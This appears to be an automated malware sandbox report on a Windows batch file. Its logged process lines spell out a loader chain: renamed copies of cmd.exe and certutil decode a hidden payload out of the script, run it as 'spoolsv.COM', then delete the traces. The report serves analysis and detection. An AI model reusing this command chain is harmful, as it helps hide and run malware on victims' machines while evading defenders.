Windows Analysis Report
Svcrhpjadgyclc.cmd

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7828

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\799dc104-3df7-4b0f-9452-88d1053ad102

Source: C:\Users\Public\Libraries\spoolsv.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Svcrhpjadgyclc.cmd

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COM
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Users\Public\Libraries\spoolsv.COM	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 2156
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
